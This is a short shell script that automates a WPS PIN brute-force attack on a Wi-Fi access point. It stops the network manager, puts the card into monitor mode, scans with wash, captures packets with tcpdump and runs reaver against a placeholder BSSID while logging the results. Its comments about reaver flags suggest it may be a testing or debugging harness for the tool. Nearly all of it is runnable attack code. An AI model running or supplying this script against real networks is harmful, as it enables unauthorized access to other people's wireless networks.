#!/bin/sh
export BSSID=AA:BB:CC:DD:EE:FF
export ESSID="AP Essid"
export CHAN=1

service network-manager stop
sleep 5
ifconfig wlan0 down
sleep 5
killall wpa_supplicant
sleep 5

airmon-ng start wlan0 ${CHAN}
sleep 5

wash -i mon0 -c ${CHAN}> wash_log.txt 2>&1 &
WASH_PID=$!
sleep 20
/bin/kill -s SIGINT $WASH_PID

tcpdump -i mon0 -s0 -w reaver_dump.pcap &
TCPDUMP_PID=$!

# Reaver could use a non-interactive --resume-session/--discard-session flag...
rm ./*.wpc
rm /etc/reaver/reaver.db
rm /etc/reaver/*.wpc

reaver -i mon0 -e "${ESSID}" -b ${BSSID} -c ${CHAN} -vv -S > reaver_log.txt 2>&1 &
REAVER_PID=$!
sleep 60
# ...and an alternative to -g that counts unsuccessful attempts.
/bin/kill -s SIGINT $REAVER_PID

reaver --help > reaver_help.txt 2>&1

/bin/kill -s SIGINT $TCPDUMP_PID
